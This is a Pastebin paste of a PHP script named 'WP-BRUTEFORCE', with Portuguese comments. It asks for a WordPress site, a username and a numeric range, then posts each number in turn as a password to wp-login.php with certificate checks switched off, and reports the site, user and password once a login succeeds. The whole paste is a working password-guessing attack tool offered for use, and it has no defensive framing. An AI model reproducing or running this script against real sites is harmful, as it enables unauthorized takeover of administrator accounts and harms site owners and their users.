Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- * Script: WP-BRUTEFORCE
- * Author: Hamboldt
- * E-mail: Hamboldt[at]hotmail[dot]com
- *
- */
- function wpLogin($Login, $Senha, $Address) {
- /*
- * Arquivo para salvar us kuki
- */
- $CookieFile = "cookie.txt";
- /*
- * Os dados que serão jogados na URL
- */
- $x = "log=".$Login."&pwd=".$Senha."&wp-submit=Log%20In&redirect_to=".$Address."wp-admin/&testcookie=1";
- /*
- * Sessão Curl
- */
- $Hamboldt = curl_init();
- curl_setopt($Hamboldt, CURLOPT_URL, $Address . "wp-login.php");
- curl_setopt($Hamboldt, CURLOPT_SSL_VERIFYPEER, FALSE);
- curl_setopt($Hamboldt, CURLOPT_TIMEOUT, 60);
- curl_setopt($Hamboldt, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($Hamboldt, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($Hamboldt, CURLOPT_COOKIEJAR, $CookieFile);
- curl_setopt($Hamboldt, CURLOPT_REFERER, $Address . "wp-admin/");
- curl_setopt($Hamboldt, CURLOPT_POSTFIELDS, $x);
- curl_setopt($Hamboldt, CURLOPT_POST, 1);
- /*
- * Saida de dados
- */
- $out = curl_exec($Hamboldt);
- /*
- * Verifica se o login foi bem sucedido
- */
- $rgx = preg_match('/admin-ajax.php/', $out, $match, PREG_OFFSET_CAPTURE, 14);
- if($rgx) return 1;
- }
- /*
- * Função para gerar um password randomico
- */
- function HamDomic ($site, $user, $inicial, $final) {
- for ($pass = $inicial; $pass <= $final; $pass++) {
- if(wpLogin($user, $pass, $site))
- die("\n [+] Site: $site \n [+]User: $user \n [+]Pass: $pass \n\n");
- }
- }
- /*
- * BANNER
- */
- system('clear');
- print_r("
- H A M B O L D T\n\n");
- /*
- * Valores que o usuário irá dar entrada
- */
- $site = readline(" [*] Site: ");
- $user = readline(" [*] User: ");
- $inicial = readline(" [*] Inicial: ");
- $final = readline(" [*] Final: ");
- /*
- * Executa função
- */
- HamDomic($site, $user, $inicial, $final);
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement